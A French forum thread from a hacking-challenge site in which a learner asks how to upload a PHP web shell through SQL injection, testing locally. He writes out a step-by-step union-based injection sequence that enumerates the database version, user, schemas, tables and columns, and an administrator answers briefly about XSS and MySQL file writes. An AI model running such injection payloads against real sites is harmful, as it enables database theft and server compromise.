besoin d'aide apprentissage faille web.

Homepage

NewbieContest

Général» Général» besoin d'aide apprentissage faille web.

Pages: [1]

Auteur

Fil de discussion: besoin d'aide apprentissage faille web. (Lu 3030 fois)

hannibal-lecter

Profil challenge
ClientSide : 0/20

ClientSide : 0/20

Cryptographie : 0/52

Forensics : 0/15

Programmation : 0/39

Stéganographie : 0/56

non classé(e).

Néophyte

Hors ligne

Hors ligne
Messages: 5

Voir le profil

besoin d'aide apprentissage faille web.

« le: 05 Janvier 2014 à 16:33:05 »

Bonjour,

Je recherche une ou des personnes assez douer en faille web pour m'apprendre un peut, je fais divers test de piratage en local et notamment les faille web, j'aimerais savoir comment puis-je uploader un shell php a travers une injection sql sans passer par le panel mysql>

Je sais qu'il existe 3 manière pour le faire :
------------------------------------------------------

1- En obtenant les users et mots de passe de la base de donnée mysql> (privilègue root)
2- Par l’intermédiaire d'un formulaire si dans l'administration de ce site il y en a un de présent, ( cela peut comporter des contournement de forcing a l'upload).
3- En modifiant un module (par exemple joomla).

donc voilà ma procédure de base ...

http://localhost/index.php?id=16
http://localhost/index.php?id=16+order+by+3--
http://localhost/index.php?id=-16+union+all+select+1,2--
http://localhost/index.php?id=-16+union+all+select+version(),2--
http://localhost/index.php?id=-16+union+all+select+user(),2--
http://localhost/index.php?id=-16+union+all+select+database(),2--
http://localhost/index.php?id=-16+union+all+select+1,table_name+from+information_schema.tables--
http://localhost/index.php?id=-16+union+all+select+1,group_concat(schema_name)+from+information_schema.schemata--
http://localhost/index.php?id=-16+union+all+select+1,group_concat(column_name)+from+information_schema.columns+where+table_schema=database()--

je voudrais procéder ainsi pour l'upload shell ou par xss (mais ça j'en est aucune idée)

si une personne aurait une solution autre que cela merci d'avance.


« Dernière édition: 05 Janvier 2014 à 16:42:40 par hannibal-lecter »	Journalisée

the lsd

Administrateur

Profil challenge
ClientSide : 19/20

ClientSide : 19/20

Crackme : 15/42

Cryptographie : 30/52

Forensics : 9/15

Hacking : 25/30

Logique : 25/36

Programmation : 16/39

Stéganographie : 31/56

Classement : 190/54318

Membre Héroïque

Hors ligne

Hors ligne
Messages: 3096

poulping for fun & profit

Voir le profil

WWW

Re : besoin d'aide apprentissage faille web.

« #1 le: 13 Janvier 2014 à 11:48:33 »

Io,

Uploader un shell via XSS, bon courage. C'est pas possible directement. Par exemple, tu pourrais si tu trouvais une XSS, que l'admin du site clique sur ta xss ou l'éxecute en allant sur une page (dépend de si ta xss est permanente ou non), et que ta XSS fasse exécuter les bonnes commandes à l'admin. Mais pour ça, il faut savoir exactement comment fonctionne le backoffice du site. Mais du JS client side ne pourra jamais écrire sur le serveur.

Via SQL c'est plus facile déjà, il existe quelques commandes pour écrire sur le serveur avec mysql, je les ai plus en tête, je te laisse chercher

Enjoy

The lsd


	Journalisée

Newbie Contest Staff :
The lsd - Th3_l5D (IRC)
Statut :
Administrateur
Citation :
Cartésien désabusé : je pense, donc je suis, mais je m'en fous !

Pages: [1]

Aller à:

Powered by SMF 1.1.21 | SMF © 2006-2011, Simple Machines

MySQL | PHP | XHTML | CSS